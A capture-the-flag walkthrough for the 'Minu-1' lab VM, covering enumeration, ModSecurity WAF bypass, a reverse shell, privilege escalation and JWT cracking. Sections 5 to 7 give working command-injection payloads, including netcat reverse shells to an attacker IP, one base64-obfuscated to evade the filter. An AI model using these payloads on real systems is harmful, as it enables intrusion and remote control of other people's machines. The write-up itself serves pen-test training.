How to Bypass a WAF and Capture the Flag on Minu-1 – A Complete Pen‑Test Walkthrough

1. NMAP Information Gathering

Run a SYN scan with service and OS detection against the target IP 10.163.197.21 using nmap -sS -sV -T5 -A 10.163.197.21. The scan reveals open ports 25 (SMTP), 80 (Apache 2.4.7 on Ubuntu) and 110 (POP3).

2. Web Information Enumeration

Access the HTTP service on port 80 and discover the default Apache page. Use dirb http://10.163.197.21/ to brute‑force directories. Most responses are 403, indicating a WAF; only index.html returns 200.

Search for files with specific extensions using dirb -X .php .html http://10.163.197.21/, which discovers test.php. Visiting http://10.163.197.21/test.php shows a “Read last visitor data” message, hinting at possible file inclusion.

3. WAF Identification (Part 1)

Use the tool wafw00f http://10.163.197.21/ to fingerprint the firewall. The newer version fails to identify it, but the older version reports ModSecurity , an open‑source WAF.

4. WAF Bypass (Part 2) – Fuzzing

Apply wfuzz with the All_attack.txt payload list against the file parameter. Filter out 403/404 responses to focus on successful payloads.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 404,403 http://10.163.197.21/test.php?file=FUZZ

One successful payload is |dir, which can be used to execute commands after bypassing the WAF.

5. WAF Bypass (Part 3) – Command Chaining

Appending a semicolon ; or ampersand & separates commands. Example: http://10.163.197.21/test.php?file=last.html;id executes id despite the filter.

6. WAF Bypass (Part 4) – Binary Abuse

Leverage binaries listed on GTFOBins . Using busybox allows command execution:

http://10.163.197.21/test.php?file=YLion;busybox nc 10.163.196.91 6789 -e sh

.

7. WAF Bypass (Part 5) – URL‑Encoding & Base64

Encode the ampersand as %26 and spaces as %20. Use base64 to hide the payload, removing trailing = by adding a space before encoding.

%26/bin/echo bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2Ljg5IDEzMzcK|/usr/bin/base64 -d|/bin/sh

8. Stable Shell Upgrade

After obtaining a reverse shell, upgrade it to an interactive TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

SHELL=/bin/bash script -q /dev/null

9. Internal Information Gathering

Run uname -a to confirm a 32‑bit Linux kernel. Upload and execute linpeas.sh for automated privilege‑escalation enumeration.

The script reveals a vulnerable sudo version (CVE‑2021‑3156) and a user bob with sudo rights.

10. Privilege Escalation – JWT Analysis

A hidden file ._pw_ contains a JWT token. Decoding the header and payload shows a signed token. Using the open‑source tool jwtcrack discovers the secret mlnV1, allowing login as root with password mlnV1.

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

11. Capture the Flag

After escalating to root, read /root/flag.txt to obtain the final flag.

This article focuses on WAF bypass techniques while also covering enumeration, shell stabilization, privilege escalation, and JWT cracking to demonstrate a complete penetration‑testing workflow.